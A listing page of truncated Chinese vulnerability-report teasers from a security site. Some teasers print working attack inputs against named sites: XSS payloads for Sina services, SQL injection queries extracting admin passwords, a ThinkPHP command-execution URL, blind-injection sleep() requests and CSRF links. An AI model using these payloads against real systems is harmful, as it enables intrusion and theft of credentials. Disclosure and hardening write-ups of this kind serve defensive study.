新浪邮件正文富文本过滤不严格 可插入任意标签关注热度:27

新浪邮件正文富文本过滤不严格，可以插入任意标签，导致XSS。发送邮件时，使用fiddler拦截修改邮件正文内容为aaaaaaaaaaaascript defer=deferalert(/xss by cc/);/sciframeript提交后，过滤器会去掉...[详情]

康城公司注册类网站系统cookies注入漏洞 - 网站安关注热度:19

康城公司注册类网站系统 v9.6cookies 注入中转http://www.2cto.com /jmcook.asp?jmdcw=17+and 1=2 union select 1,2,password,4,5,password,7,8,9,10,11,12,13 from admin后台拿shellcookies 名小子 .....[详情]

泡泡网某子站任意文件上传 - 网站安全 - 自学p关注热度:15

可直接上传任意文件权限很恐怖作者 Coody..[详情]

JAVA(JSP)内容网站管理系统jeecms的FCK上传漏洞 - 网关注热度:23

www.2cto.com /thirdparty/fckeditor/editor/filemanager/browser/default/browser.html?Type=ImageConnector=connectors/jsp/connector.jsp注释：据测试无法获得一般文件上传漏洞具备的shell或其他篡改权限，.....[详情]

大河网汽车分站存在SQL注入漏洞 - 网站安全 - 自关注热度:11

注入点：http://auto.dahe.cn/daili/ding.asp?uid=93id=4364泄露了数据库信息，用户账号密码泄露...修复方案：过滤~作者 疏懒..[详情]

校无忧投票系统利用0day(数据库下载+拿shell) - 网关注热度:23

以前的： 校无忧学校网站系统1.0 漏洞及修复其实呢，也算不上一个0day.只是一个思路罢了，最近无聊。无视上A5看了下，发现一个投票系统，粗略的看了下，用的人也挺多，于是就下下..[详情]

细谈php中SQL注入攻击与XSS攻击 - 网站安全 - 自学关注热度:20

通常在编程中程序员要考虑的问题不仅是代码效率与代码复用性,而且还要考虑一些安全问题{例如: SQL注入攻击 XSS攻击任意执行代码文件包含以及CSRF.}关于SQL攻击有很多文章还有各种防注..[详情]

详细记录渗透王老吉网站以及服务器 - 网站安全关注热度:25

作者：Tr0jan打开主页wlj.com.cn，看下大概架构，.net语言，试了试FCK编辑器，返回404，打开WVS详细扫描网站架构以及敏感目录发现2005目录下，是以前的ASP站点，令人激动的上传利用明小子..[详情]

QQ闹钟可伪造成任意用户发送邀请消息 - 网站安全关注热度:21

POST /cgi-bin/qzapps/appinvite_invite.cgi?g_tk=1023854850 HTTP/1.1Host: appsupport.qq.comProxy-Connection: keep-aliveReferer: http://ctc.qzs.qq.com/qzone/v5/toolpages/fp_utf8.htmlContent-Leng.....[详情]

大河网命令一执行漏洞及修复 - 网站安全 - 自学关注热度:9

依然是tp的问题http://yazz.dahe.cn/index.php?s=/Info/index/param1/${@phpinfo%28%29}修复方案：依然是tp的问题作者 蟋蟀哥哥..[详情]

美特斯邦威官方商城几个盲注 - 网站安全 - 自学关注热度:27

http://act.banggo.com/Ajax/adCodeInfo?time=0.7242165785281457callback=jsonp1335235877318adposid=175%09and%09sleep%2828100%29--act.banggo.com/Ajax/adCodeInfo?adposid=1%09order%09by%098--(8个字段,.....[详情]

腾讯某分站csrf漏洞及修复方案 - 网站安全 - 自学关注热度:15

腾讯某分站未做csrf防范，导致漏洞产生!1、去发微博2、只要用户点击链接就触发csrf攻击修复方案：加入token或判断referer作者 Xhm1n9..[详情]

再暴用友ICC网站客服系统任意文件上传漏洞 - 网关注热度:41

再暴用友ICC网站客服系统任意文件上传漏洞，看了一下上一个漏洞：http://www.2cto.com/Article/201204/127159.html，发现还存在其它的上传漏洞。不知是不是还没升级完成或是什么问题，但测试多..[详情]

服务器安全配置禁止木马程序执行 - 网站安全关注热度:23

目前解决方案就是禁止木马程序在图片目录中执行以下是服务器配置，虚拟主机配置不了。一、apache设置方法找到httpd.conf 文件在里面 加上以下代码,其中/attachment 是目录，自行修改。例..[详情]

SHOPEX 4.8.5 SQL注射以及后台拿SHELL - 网站安全 - 自关注热度:18

漏洞核心函数\core\model_v5\trading\mdl.goods.php由于是zend解密出来的 具体行数就不贴了01 function getproducts( $gid, $pid = 0 ) //注入注入注入注入注入注入注入注入注入注入注入注入注入注入注.....[详情]

利用输入框进行恶意代码注入 - 网站安全 - 自学关注热度:56

现在让我们来看看下图：这是一个提供查询DNS服务的网站接口，用户可以在输入框中键入IP或主机名来进行查询。他的代码实现也并不复杂，如下：?phpif (isset($_POST[dns-lookup-php-submit-butt..[详情]

由linkedin数据库泄漏引发的思考 - 网站安全 - 自关注热度:41

【事件回放】上周三晚上（6月6日），知名专业社交网站LinkedIn爆出部分用户账户密码失窃，LinkedIn主管文森特希尔维拉（Vicente Silveira）在其个人博客中证实了此事。根据Venturebeat的报道..[详情]

iBoutique eCommerce v4.0多个web漏洞及修复 - 网站安全关注热度:24

标题：iBoutique eCommerce v4.0 - Multiple Web Vulnerabilites程序介绍:=============iBoutique is a PHP ecommerce solution that allows you to setup and maintain your own estore. .....[详情]

web安全之信息刺探防范（下） - 网站安全 - 自学关注热度:25

上篇：http://www.2cto.com/Article/201206/134845.html煮酒品茶：针对上章的刺探来获取信息而进行防御，并没有写具体的方法防，这东西谷歌一下一大把，所以可以先在测试环境上试试。1、简单的..[详情]

新浪轻博客存存储型XSS漏洞 - 网站安全 - 自学p关注热度:17

轻博客富文本过滤不严格，style属性可以插入expression代码，导致存储型XSS。漏洞触发方法：提交地址：http://qing.weibo.com/blog/api/artedit.phpPOST数据:domain=0body=div+style=x:\00%26%2354%3B5xpress.....[详情]

51javacms后台jsp文件上传漏洞及官网任意文件下载关注热度:26

程序员安全意识过低，后台允许上传jsp格式文件。后台多处可上传jsp类型文件，无任何过滤。反编译过来的源码看还存在很多安全问题。 进入后台系统系统管理-- www.2cto.com 文章附件管理..[详情]

Webshell代码检测背后的数学应用 - 网站安全 - 自学关注热度:28

为了加强WeBaCoorsquo;s躲避恶意代码检测的能力，我最近不停的在测试各种各样隐藏Webshell代码的工具和方法。最新被我发现的一个工具是NeoPi，是一个python脚本。它使用各种各样的统计学..[详情]

PHP Decoda 3.3.1本地文件包含缺陷及修复 - 网站安全关注热度:16

标题: [php-decoda local file inclusion ]作者: [Number 7]软件地址: [http://milesj.me/code/php/decoda]影响版本: [3.3.1]测试平台: [linux]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.....[详情]

WEBO Site SpeedUp <= 1.6.1多重缺陷及修复 - 网站安全关注热度:19

发现者dun \ posdub[at]gmail.com ################################################################ [ WEBO Site SpeedUp = 1.6.1 ] Multiple Vulnerabilites # Script: WEBO Site SpeedU.....[详情]

QNAP Turbo NAS 3.6.1 Build 0302T多个缺陷及修复 - 网站安关注热度:35

影响产品 QNAP平台 Turbo NAS (verified) and possibly others受影响版本. Firmware Version: 3.6.1 Build 0302T and priorSeverity Rating. HighImpact. Exposure of sensitive informat.....[详情]

新浪微博csrf漏洞 引诱用户在不知情的情况下加微关注热度:23

http://paifu.sina.com.cn/friend.php?ids=1599913322http://client.sina.com.cn/htcwildfire/friend.php?id=1599913322两个网址，点击后便会增加关注，更改id值为想要加关注的人即可，如微博在登入时显示网址为.....[详情]

TheBlog <= 2.0多重缺陷及修复 - 网站安全 - 自学关注热度:19

?php# 标题: TheBlog = 2.0 SQL Injection# 作者: WhiteCollarGroup#下载地址: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news# 开发网站e: http://theblog.codigolivre.org.br/# 影响版本: .....[详情]

News Script PHP v1.2多重缺陷及修复 - 网站安全 - 自学关注热度:19

标题：News Script PHP v1.2 - Multiple Web Vulnerabilites影响系统7.5介绍:=============Visitors to your website will be able to read news, articles, interviews and stories which.....[详情]

iScripts EasyCreate CMS v2.0多个缺陷及修复 - 网站安全关注热度:19

标题：iScripts EasyCreate CMS v2.0 - Multiple Web Vulnerabilites程序介绍:=============iScripts EasyCreate is an online web site building tool that can be hosted on your serve.....[详情]

对某非主流外贸网站的渗透测试 - 网站安全 - 自关注热度:53

首先粗略的看了下网站的整体结构、发现不是那种5分钟就能叼下的垃圾企业站。旁站看了下都是同一个程序做的C段我就懒的看了，因为像这种站所在机房你能ARP到数据的几率比中国足球..[详情]